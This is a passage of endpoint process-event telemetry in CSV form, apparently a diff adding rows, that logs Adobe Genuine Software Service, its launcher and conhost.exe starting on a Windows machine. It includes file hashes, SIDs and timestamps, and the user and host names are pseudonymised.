+41,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:58.944206800+00:00,2128,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vjnxbm 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:59.000239400+00:00,2021-06-24 03:21:31.818343700+00:00,0531c72a-94d6-43b3-ad37-b74a08a9b332,computerpii_0a470890c60768167990033d701e7bd881398861,174081,False,10.7740.19041.1052,False,11540474045136991,,11540474045176202,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+42,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:58.988532100+00:00,12992,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:58.944206800+00:00,2128,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_vjnxbm 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:59.357203800+00:00,2021-06-24 03:21:31.818506300+00:00,85553947-1050-4ee1-96b6-97fa44b3a34f,computerpii_0a470890c60768167990033d701e7bd881398861,174084,False,10.7740.19041.1052,False,11540474045176202,,11540474045176203,2021-06-24 03:18:58.944206800+00:00,2128,2021-06-24 03:18:58.944206800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,2128,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:18:58.947664600+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+43,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:59.402962+00:00,6892,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ytpdun 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:59.453625700+00:00,2021-06-24 03:21:31.818606500+00:00,625e881a-bf7c-4a29-8d05-7f18bb12a56f,computerpii_0a470890c60768167990033d701e7bd881398861,174086,False,10.7740.19041.1052,False,11540474045136991,,11540474045176205,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,18560,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+44,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:59.416370200+00:00,15388,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:59.402962+00:00,6892,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_ytpdun 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:59.454072700+00:00,2021-06-24 03:21:31.818659400+00:00,7be12b7c-2eca-414c-b20b-13de2a988945,computerpii_0a470890c60768167990033d701e7bd881398861,174087,False,10.7740.19041.1052,False,11540474045176205,,11540474045176206,2021-06-24 03:18:59.402962+00:00,6892,2021-06-24 03:18:59.402962+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,6892,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:18:58.947664600+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+45,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:59.945599100+00:00,6864,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_jrphjs 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:18:59.955924800+00:00,2021-06-24 03:21:31.818822800+00:00,731e231d-ab90-4444-b7e2-a2e52c034ae2,computerpii_0a470890c60768167990033d701e7bd881398861,174090,False,10.7740.19041.1052,False,11540474045136991,,11540474045176209,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,128,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+46,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:18:59.951999400+00:00,10244,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:18:59.945599100+00:00,6864,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_jrphjs 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.101030100+00:00,2021-06-24 03:21:31.819145600+00:00,a4691730-1494-45ce-904f-bd8ee1429ef7,computerpii_0a470890c60768167990033d701e7bd881398861,174094,False,10.7740.19041.1052,False,11540474045176209,,11540474045176211,2021-06-24 03:18:59.945599100+00:00,6864,2021-06-24 03:18:59.945599100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,6864,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:18:58.947664600+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,0.0,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+47,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:00.182416800+00:00,19396,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_bejino 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.230150900+00:00,2021-06-24 03:21:31.819395600+00:00,fb68c0e4-7bb1-4a24-9ad7-ea7d1c0ffb5c,computerpii_0a470890c60768167990033d701e7bd881398861,174098,False,10.7740.19041.1052,False,11540474045136991,,11540474045176212,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+48,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:00.185975300+00:00,11124,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17644"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17644""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,323272,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.230971900+00:00,2021-06-24 03:21:31.819447500+00:00,64952d34-566e-4efe-977d-9113b1d59a01,computerpii_0a470890c60768167990033d701e7bd881398861,174099,False,10.7740.19041.1052,False,11540474045136991,,11540474045176213,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,AGMService.exe,4496,256,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility
+49,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:00.189952600+00:00,5496,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:00.182416800+00:00,19396,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_bejino 3",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.231291100+00:00,2021-06-24 03:21:31.819500200+00:00,4ec834c7-335f-44b9-b06b-0f7c9a6ce9d4,computerpii_0a470890c60768167990033d701e7bd881398861,174100,False,10.7740.19041.1052,False,11540474045176212,,11540474045176214,2021-06-24 03:19:00.182416800+00:00,19396,2021-06-24 03:19:00.182416800+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,19396,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:19:00.206095400+00:00,2020-09-22 19:30:00+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+50,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 03:19:00.200968700+00:00,20948,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,aba44041ab85b375a2d7a06b3e32bf84,eff994171e80a7d59637b48cf2d338399c468dc245ad8a7cb56d4d15bdc7dc89,791e623973adcbe6888602ae5314180c62f78677,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 03:19:00.185975300+00:00,11124,Adobe Genuine Launcher.exe,"""Adobe Genuine Launcher.exe"" --xmlFilePath=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGCData\adobegc_a17644"" --workflowInitiator=SA --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a17644""",False,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:19:00.231986+00:00,2021-06-24 03:21:31.819551100+00:00,52409c49-2e83-4c6d-985f-0d2eb1980130,computerpii_0a470890c60768167990033d701e7bd881398861,174101,False,10.7740.19041.1052,False,11540474045176213,,11540474045176215,2021-06-24 03:19:00.185975300+00:00,11124,2021-06-24 03:19:00.185975300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\Adobe Genuine Launcher.exe,11124,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,323272,2021-02-17 03:19:42+00:00,2021-02-16 19:38:26+00:00,2021-06-24 03:19:00.214075400+00:00,2020-09-22 19:30:00+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,,,,0.0,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClientLauncher,AdobeGCClientLauncher.exe,Adobe Genuine Launch Utility,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
